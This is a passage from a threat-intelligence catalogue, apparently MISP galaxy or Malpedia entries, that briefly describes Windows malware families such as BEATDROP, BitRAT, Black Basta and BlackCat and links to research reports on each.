https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://malwarebookreports.com/bazarloader-back-from-holiday-break/

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9

https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/

https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles

https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/

https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/

https://www.youtube.com/watch?v=uAkeXCYcl4Y

https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

https://twitter.com/Unit42_Intel/status/1458113934024757256

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://forensicitguy.github.io/bazariso-analysis-advpack/

https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/

https://thedfirreport.com/2021/01/31/bazar-no-ryuk/

https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day

https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/

https://unit42.paloaltonetworks.com/bazarloader-malware/

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv

https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://intel471.com/blog/conti-leaks-ransomware-development

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://abnormalsecurity.com/blog/bazarloader-contact-form

https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/

https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

https://cofense.com/blog/bazarbackdoor-stealthy-infiltration

https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon

https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/

https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf

https://experience.mandiant.com/trending-evil/p/1

https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets

https://thedfirreport.com/2020/10/08/ryuks-return/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

https://fr3d.hk/blog/campo-loader-simple-but-effective

https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf

https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware

https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/

https://www.scythe.io/library/threatthursday-ryuk

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://johannesbader.ch/blog/yet-another-bazarloader-dga/

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/

https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident

https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html

https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/

https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e

https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html

https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/

https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

Beapy

According to Symantec, Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.

The tag is: misp-galaxy:malpedia="Beapy"

Beapy is also known as:

Table 2994. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy

https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china

BEATDROP

According to Mandiant, BEATDROP is a downloader written in C that uses Atlassian’s project management service Trello for C&C. BEATDROP uses Trello to store victim information and retrieve AES-encrypted shellcode payloads to be executed. BEATDROP then injects and executes downloaded payloads into a suspended process. Upon execution, BEATDROP maps a copy of ntdll.dll into memory to execute shellcode in its own process. The sample then creates a suspended thread with RtlCreateUserThread; the thread points to NtCreateFile. The sample changes execution to the shellcode and resumes the thread. The shellcode payload is retrieved from Trello and is targeted per victim. Once the payload has been retrieved, it is deleted from Trello.

The tag is: misp-galaxy:malpedia="BEATDROP"

BEATDROP is also known as:

Table 2995. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop

https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/

https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns

https://mp.weixin.qq.com/s?biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58

Bee

Malware family observed in conjunction with PlugX infrastructure in 2013.

The tag is: misp-galaxy:malpedia="Bee"

Bee is also known as:

Table 2997. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bee

https://www.virustotal.com/gui/file/38f9ce7243c7851d67b24eb53b16177147f38dfffe201c5bedefe260d22ac908/detection

beendoor

BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim’s desktop.

The tag is: misp-galaxy:malpedia="beendoor"

beendoor is also known as:

Table 2998. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

BeepService

The tag is: misp-galaxy:malpedia="BeepService"

BeepService is also known as:

Table 2999. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Belonard

Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer becomes infected with Trojan.Belonard.

The tag is: misp-galaxy:malpedia="Belonard"

Belonard is also known as:

Table 3000. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard

https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0

BestKorea

The tag is: misp-galaxy:malpedia="BestKorea"

BestKorea is also known as:

Table 3003. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bestkorea

https://github.com/Jacquais/BestKorea

Bezigate

Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files.

The Trojan may perform the following actions:

  • List, move, and delete drives

  • List, move, and delete files

  • List processes and running window titles

  • List services

  • List registry values

  • Kill processes

  • Maximize, minimize, and close windows

  • Upload and download files

  • Execute shell commands

  • Uninstall itself

The tag is: misp-galaxy:malpedia="Bezigate"

Bezigate is also known as:

Table 3005. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

BfBot

The tag is: misp-galaxy:malpedia="BfBot"

BfBot is also known as:

Table 3006. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot

BHunt

BHunt collects the crypto wallets of its victims. The malware consists of several functions/modules, e.g. a reporting module that reports the presence of crypto wallets on the target computers to the C2 server. It searches for many different cryptocurrencies (e.g. Atomic, Bitcoin, Electrum, Ethereum, Exodus, Jaxx and Litecoin). The Blackjack module is used to steal wallets, Sweet_Bonanza steals victims' browser passwords. There are also modules like the Golden7 or the Chaos_crew module.

The tag is: misp-galaxy:malpedia="BHunt"

BHunt is also known as:

Table 3007. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt

https://blogs.blackberry.com/en/2022/02/threat-thursday-bhunt-scavenger

https://www.bleepingcomputer.com/news/security/new-bhunt-malware-targets-your-crypto-wallets-and-passwords/

https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf

BianLian (Windows)

BianLian is a GoLang-based ransomware that continues to breach several industries and demand large ransom amounts. The threat actors also use the double extortion method by stealing an affected organization’s files and leaking them online if the ransom is not paid on time. BianLian gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion. The BianLian ransomware uses goroutines and encrypts files in chunks to quickly hijack an infected system. The ransomware adds its own extension to each encrypted file.

The tag is: misp-galaxy:malpedia="BianLian (Windows)"

BianLian (Windows) is also known as:

Table 3008. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bianlian

https://twitter.com/malwrhunterteam/status/1558548947584548865

https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://embee-research.ghost.io/building-advanced-censys-queries-utilising-regex-bianlian/

https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

BI_D Ransomware

Small and relatively simple ransomware for Windows. Gives files the .BI_D extension after encrypting them with a combination of RSA/AES. Persistence is achieved via the Windows Registry. Kills all processes on the victim machine besides itself and a small whitelist of mostly Windows system processes, and deletes shadow copies.

The tag is: misp-galaxy:malpedia="BI_D Ransomware"

BI_D Ransomware is also known as:

Table 3009. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware

http://zirconic.net/2018/07/bi_d-ransomware/

http://zirconic.net/2019/03/bi_d-ransomware-redux-now-with-100-more-ghidra/

BillGates

BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.

BillGates is available for *nix-based systems as well as for Windows.

On Windows, the (Bill)Gates installer typically contains the various modules as linked resources.

The tag is: misp-galaxy:malpedia="BillGates"

BillGates is also known as:

Table 3011. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates

https://www.bleepingcomputer.com/news/security/log4shell-exploits-now-used-mostly-for-ddos-botnets-cryptominers/

https://habrahabr.ru/post/213973/

https://bartblaze.blogspot.com/2017/12/notes-on-linuxbillgates.html

https://thisissecurity.stormshield.com/2015/09/30/when-elf-billgates-met-windows/

https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

https://securelist.com/versatile-ddos-trojan-for-linux/64361/

https://www.fortinet.com/blog/threat-research/recent-attack-uses-vulnerability-on-confluence-server

Binanen

Binanen is a dropper that drops and executes a section of itself into a hidden dummy process. According to F-Secure, it executes command line tools such as (for example) asipconfig, which is useful to retrieve the network configuration. The malware aims to steal information about the machine, the username, installed software and, more generally speaking, it potentially can carry out actions on the compromised machine.

The tag is: misp-galaxy:malpedia="Binanen"

Binanen is also known as:

Table 3012. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.binanen

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/TrojBinanen-B/detailed-analysis.aspx

bioload

The tag is: misp-galaxy:malpedia="bioload"

bioload is also known as:

Table 3014. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bioload

https://www.fortinet.com/blog/threat-research/bioload-fin7-boostwrite-lost-twin.html

BIOPASS

BIOPASS RAT is a malware family which targets online gambling companies in China by leveraging a watering hole attack. This Remote Access Trojan (RAT) is unique in that it leverages the Open Broadcaster Software (OBS) framework to monitor the user’s screen.

The tag is: misp-galaxy:malpedia="BIOPASS"

BIOPASS is also known as:

Table 3015. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.biopass

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

BitPyLock

BitPyLock is a ransomware that encrypts files using asymmetric keys and appends '.bitpy' as a suffix once the encryption phase has ended. The ransom note appears on the affected user’s Desktop with the following name: "# # HELP_TO_DECRYPT_YOUR_FILES # .html". At the time of writing, the ransom demand is 0.8 BTC and the contact email is: helpbitpy@cock.li.

The tag is: misp-galaxy:malpedia="BitPyLock"

BitPyLock is also known as:

Table 3018. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bitpylock

https://www.bleepingcomputer.com/news/security/bitpylock-ransomware-now-threatens-to-publish-stolen-data/

https://yomi.yoroi.company/report/5e1d77b371ef016089703d1a/5e1d79d7d1cc4993da62f24f/overview

https://twitter.com/malwrhunterteam/status/1215252402988822529

Bitsran

SHADYCAT is a dropper and spreader component for the HERMES 2.1 RANSOMWARE radical edition.

The tag is: misp-galaxy:malpedia="Bitsran"

Bitsran is also known as:

  • SHADYCAT

Table 3019. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran

http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html

https://content.fireeye.com/apt/rpt-apt38

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug-180129.pdf

BitRAT

According to Bitdefender, BitRAT is a notorious remote access trojan (RAT) marketed on underground cybercriminal web markets and forums. Its price tag of $20 for lifetime access makes it irresistible to cybercriminals and helps the malicious payload spread.

Furthermore, each buyer’s modus operandi makes BitRAT even harder to stop, considering it can be employed in various operations, such as trojanized software, phishing and watering hole attacks.

BitRAT’s popularity arises from its versatility. The malicious tool can perform a wide range of operations, including data exfiltration, UAC bypass, DDoS attacks, clipboard monitoring, gaining unauthorized webcam access, credential theft, audio recording, XMRig coin mining and generic keylogging.

The tag is: misp-galaxy:malpedia="BitRAT"

BitRAT is also known as:

Table 3021. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat

https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware

https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf

https://blog.qualys.com/vulnerabilities-threat-research/2023/01/03/bitrat-now-sharing-sensitive-bank-data-as-a-lure

https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/

https://www.fortinet.com/blog/threat-research/nft-lure-used-to-distribute-bitrat

https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://asec.ahnlab.com/en/32781/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/

https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/

https://forensicitguy.github.io/hcrypt-injecting-bitrat-analysis/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/

https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/

https://www.bitdefender.com/blog/hotforsecurity/bitrat-malware-seen-spreading-through-unofficial-microsoft-windows-activators/

https://www.bleepingcomputer.com/news/security/bitrat-malware-now-spreading-as-a-windows-10-license-activator/

https://www.youtube.com/watch?v=CYm3g4zkQdw

https://community.riskiq.com/article/ade260c6

https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf

https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

Bizzaro

Kaspersky Labs characterizes Bizarro as yet another banking Trojan family originating from Brazil that is now found in other regions of the world. They have seen users being targeted in Spain, Portugal, France and Italy. Attempts have now been made to steal credentials from customers of 70 banks from different European and South American countries.

The tag is: misp-galaxy:malpedia="Bizzaro"

Bizzaro is also known as:

Table 3022. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bizarro

https://securelist.com/bizarro-banking-trojan-expands-its-attacks-to-europe/102258/

BKA Trojaner

BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.

The tag is: misp-galaxy:malpedia="BKA Trojaner"

BKA Trojaner is also known as:

  • bwin3_bka

Table 3023. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner

https://www.evild3ad.com/405/bka-trojaner-ransomware/

Black Basta (Windows)

"Black Basta" is a new ransomware strain discovered during April 2022 - apparently in development since at least early February 2022 - and due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.

The tag is: misp-galaxy:malpedia="Black Basta (Windows)"

Black Basta (Windows) is also known as:

  • no_name_software

Table 3024. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://securityscorecard.pathfactory.com/all/a-deep-dive-into-bla

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/

https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies

https://www.youtube.com/watch?v=iD_KZAqNDZ0

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

https://www.reliaquest.com/blog/qbot-black-basta-ransomware/

https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/

https://gbhackers.com/black-basta-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.zscaler.com/blogs/security-research/back-black-basta

https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://securelist.com/luna-black-basta-ransomware/106950

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware

BlackByte

Ransomware. Uses dropper written in JavaScript to deploy a .NET payload.

The tag is: misp-galaxy:malpedia="BlackByte"

BlackByte is also known as:

Table 3025. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbyte

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://www.trendmicro.com/vinfo/my/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/

https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/

https://de.darktrace.com/blog/detecting-the-unknown-revealing-uncategorised-ransomware-using-darktrace

https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://twitter.com/splinter_code/status/1628057204954652674

https://redcanary.com/blog/blackbyte-ransomware/

https://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html

https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/

https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups

https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants

https://www.ic3.gov/Media/News/2022/220211.pdf

https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/

BlackCat (Windows)

ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.

ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remotely execute itself on other hosts on the local network.

The tag is: misp-galaxy:malpedia="BlackCat (Windows)"

BlackCat (Windows) is also known as:

  • ALPHV

  • Noberus

Table 3026. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive

https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html

https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware

https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/

https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809

https://x.com/vxunderground/status/1731138180672344095?t=reBMQQFFMGQ_zkV8KmL_LA&s=01

https://killingthebear.jorgetesta.tech/actors/alphv

https://www.theregister.com/2023/11/16/blackcat_ransomware_luring_corporate_targets/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/

https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html

https://www.ic3.gov/Media/News/2022/220420.pdf

https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/

https://community.riskiq.com/article/47766fbd

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://unit42.paloaltonetworks.com/blackcat-ransomware/

https://www.intrinsec.com/alphv-ransomware-gang-analysis

https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

